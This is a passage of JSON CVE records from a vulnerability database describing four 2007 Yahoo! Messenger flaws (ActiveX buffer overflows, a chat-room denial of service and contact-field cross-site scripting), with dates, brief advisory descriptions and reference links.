"url": "http://www.kb.cert.org/vuls/id/932217"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-06-07T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the receive method."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-16T14:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "4043",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/4043"
},
{
"name": "yahoo-webcam-viewer-bo(34759)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34759"
},
{
"name": "37081",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/37081"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
},
{
"name": "24355",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/24355"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://messenger.yahoo.com/security_update.php?id=060707"
},
{
"name": "ADV-2007-2094",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/2094"
},
{
"name": "25547",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/25547"
},
{
"name": "20070608 EEYE: Yahoo Webcam ActiveX Controls Multiple Buffer Overflows",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
},
{
"name": "1018204",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://securitytracker.com/id?1018204"
},
{
"name": "20070607 2nd Yahoo 0day ActiveX Exploit",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063819.html"
},
{
"name": "24341",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/24341"
},
{
"name": "1018203",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1018203"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
},
{
"name": "VU#932217",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/932217"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-3148",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the receive method."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "4043",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/4043"
},
{
"name": "yahoo-webcam-viewer-bo(34759)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34759"
},
{
"name": "37081",
"refsource": "OSVDB",
"url": "http://osvdb.org/37081"
},
{
"name": "http://research.eeye.com/html/advisories/upcoming/20070605.html",
"refsource": "MISC",
"url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
},
{
"name": "24355",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/24355"
},
{
"name": "http://messenger.yahoo.com/security_update.php?id=060707",
"refsource": "CONFIRM",
"url": "http://messenger.yahoo.com/security_update.php?id=060707"
},
{
"name": "ADV-2007-2094",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/2094"
},
{
"name": "25547",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/25547"
},
{
"name": "20070608 EEYE: Yahoo Webcam ActiveX Controls Multiple Buffer Overflows",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
},
{
"name": "1018204",
"refsource": "SECTRACK",
"url": "http://securitytracker.com/id?1018204"
},
{
"name": "20070607 2nd Yahoo 0day ActiveX Exploit",
"refsource": "FULLDISC",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063819.html"
},
{
"name": "24341",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/24341"
},
{
"name": "1018203",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1018203"
},
{
"name": "http://research.eeye.com/html/advisories/published/AD20070608.html",
"refsource": "MISC",
"url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
},
{
"name": "VU#932217",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/932217"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-3148",
"datePublished": "2007-06-11T18:00:00",
"dateReserved": "2007-06-11T00:00:00",
"dateUpdated": "2024-08-07T14:05:29.296Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-1680 (GCVE-0-2007-1680)
Vulnerability from cvelistv5 – Published: 2007-04-06 01:00 – Updated: 2024-08-07 13:06
VLAI?
Summary
Stack-based buffer overflow in the createAndJoinConference function in the AudioConf ActiveX control (yacscom.dll) in Yahoo! Messenger before 20070313 allows remote attackers to execute arbitrary code via long (1) socksHostname and (2) hostname properties.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T13:06:26.204Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "yahoo-yahooaudioconf-activex-bo(33408)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/33408"
},
{
"name": "23291",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/23291"
},
{
"name": "24742",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/24742"
},
{
"name": "VU#388377",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/388377"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.zerodayinitiative.com/advisories/ZDI-07-012.html"
},
{
"name": "2523",
"tags": [
"third-party-advisory",
"x_refsource_SREASON",
"x_transferred"
],
"url": "http://securityreason.com/securityalert/2523"
},
{
"name": "ADV-2007-1219",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/1219"
},
{
"name": "34319",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/34319"
},
{
"name": "1017867",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1017867"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://messenger.yahoo.com/security_update.php?id=031207"
},
{
"name": "20070403 ZDI-07-012: Yahoo! Messenger AudioConf ActiveX Control Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/464607/100/0/threaded"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-04-02T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Stack-based buffer overflow in the createAndJoinConference function in the AudioConf ActiveX control (yacscom.dll) in Yahoo! Messenger before 20070313 allows remote attackers to execute arbitrary code via long (1) socksHostname and (2) hostname properties."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-16T14:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "yahoo-yahooaudioconf-activex-bo(33408)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/33408"
},
{
"name": "23291",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/23291"
},
{
"name": "24742",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/24742"
},
{
"name": "VU#388377",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/388377"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.zerodayinitiative.com/advisories/ZDI-07-012.html"
},
{
"name": "2523",
"tags": [
"third-party-advisory",
"x_refsource_SREASON"
],
"url": "http://securityreason.com/securityalert/2523"
},
{
"name": "ADV-2007-1219",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/1219"
},
{
"name": "34319",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/34319"
},
{
"name": "1017867",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1017867"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://messenger.yahoo.com/security_update.php?id=031207"
},
{
"name": "20070403 ZDI-07-012: Yahoo! Messenger AudioConf ActiveX Control Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/464607/100/0/threaded"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-1680",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Stack-based buffer overflow in the createAndJoinConference function in the AudioConf ActiveX control (yacscom.dll) in Yahoo! Messenger before 20070313 allows remote attackers to execute arbitrary code via long (1) socksHostname and (2) hostname properties."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "yahoo-yahooaudioconf-activex-bo(33408)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/33408"
},
{
"name": "23291",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/23291"
},
{
"name": "24742",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/24742"
},
{
"name": "VU#388377",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/388377"
},
{
"name": "http://www.zerodayinitiative.com/advisories/ZDI-07-012.html",
"refsource": "MISC",
"url": "http://www.zerodayinitiative.com/advisories/ZDI-07-012.html"
},
{
"name": "2523",
"refsource": "SREASON",
"url": "http://securityreason.com/securityalert/2523"
},
{
"name": "ADV-2007-1219",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/1219"
},
{
"name": "34319",
"refsource": "OSVDB",
"url": "http://osvdb.org/34319"
},
{
"name": "1017867",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1017867"
},
{
"name": "http://messenger.yahoo.com/security_update.php?id=031207",
"refsource": "CONFIRM",
"url": "http://messenger.yahoo.com/security_update.php?id=031207"
},
{
"name": "20070403 ZDI-07-012: Yahoo! Messenger AudioConf ActiveX Control Buffer Overflow",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/464607/100/0/threaded"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-1680",
"datePublished": "2007-04-06T01:00:00",
"dateReserved": "2007-03-26T00:00:00",
"dateUpdated": "2024-08-07T13:06:26.204Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-0868 (GCVE-0-2007-0868)
Vulnerability from cvelistv5 – Published: 2007-02-09 19:00 – Updated: 2024-08-07 12:34
VLAI?
Summary
Unspecified vulnerability in the Chat Room functionality in Yahoo! Messenger 8.1.0.239 and earlier allows remote attackers to cause a denial of service via unspecified vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T12:34:21.130Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "22407",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/22407"
},
{
"name": "34696",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/34696"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-02-05T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Unspecified vulnerability in the Chat Room functionality in Yahoo! Messenger 8.1.0.239 and earlier allows remote attackers to cause a denial of service via unspecified vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2008-11-15T10:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "22407",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/22407"
},
{
"name": "34696",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/34696"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-0868",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Unspecified vulnerability in the Chat Room functionality in Yahoo! Messenger 8.1.0.239 and earlier allows remote attackers to cause a denial of service via unspecified vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "22407",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/22407"
},
{
"name": "34696",
"refsource": "OSVDB",
"url": "http://osvdb.org/34696"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-0868",
"datePublished": "2007-02-09T19:00:00",
"dateReserved": "2007-02-09T00:00:00",
"dateUpdated": "2024-08-07T12:34:21.130Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-0768 (GCVE-0-2007-0768)
Vulnerability from cvelistv5 – Published: 2007-02-06 02:00 – Updated: 2024-08-07 12:34
VLAI?
Summary
Multiple cross-site scripting (XSS) vulnerabilities in the Contact Details functionality in Yahoo! Messenger 8.1.0.209 and earlier allow user-assisted remote attackers to inject arbitrary web script or HTML via a javascript: URI in the SRC attribute of an IMG element to the (1) First Name, (2) Last Name, and (3) Nickname fields. NOTE: some of these details are obtained from third party information.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T12:34:19.794Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "22269",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/22269"
},
{
"name": "20070126 Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/458225/100/0/threaded"
},
{
"name": "20070127 RE: Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/458305/100/0/threaded"
},
{
"name": "23928",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/23928"
},
{
"name": "31674",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/31674"
},
{
"name": "20070127 Re: Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/458494/100/0/threaded"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-01-26T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in the Contact Details functionality in Yahoo! Messenger 8.1.0.209 and earlier allow user-assisted remote attackers to inject arbitrary web script or HTML via a javascript: URI in the SRC attribute of an IMG element to the (1) First Name, (2) Last Name, and (3) Nickname fields. NOTE: some of these details are obtained from third party information."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-16T14:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "22269",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/22269"
},
{
"name": "20070126 Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/458225/100/0/threaded"
},
{
"name": "20070127 RE: Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/458305/100/0/threaded"
},
{
"name": "23928",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/23928"
},
{
"name": "31674",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/31674"
},
{
"name": "20070127 Re: Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/458494/100/0/threaded"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-0768",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in the Contact Details functionality in Yahoo! Messenger 8.1.0.209 and earlier allow user-assisted remote attackers to inject arbitrary web script or HTML via a javascript: URI in the SRC attribute of an IMG element to the (1) First Name, (2) Last Name, and (3) Nickname fields. NOTE: some of these details are obtained from third party information."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "22269",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/22269"
},
{
"name": "20070126 Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/458225/100/0/threaded"
},
{
"name": "20070127 RE: Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/458305/100/0/threaded"
},
{
"name": "23928",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/23928"
},
{
"name": "31674",
"refsource": "OSVDB",
"url": "http://osvdb.org/31674"
},
{
"name": "20070127 Re: Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/458494/100/0/threaded"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-0768",
"datePublished": "2007-02-06T02:00:00",
"dateReserved": "2007-02-05T00:00:00",
"dateUpdated": "2024-08-07T12:34:19.794Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}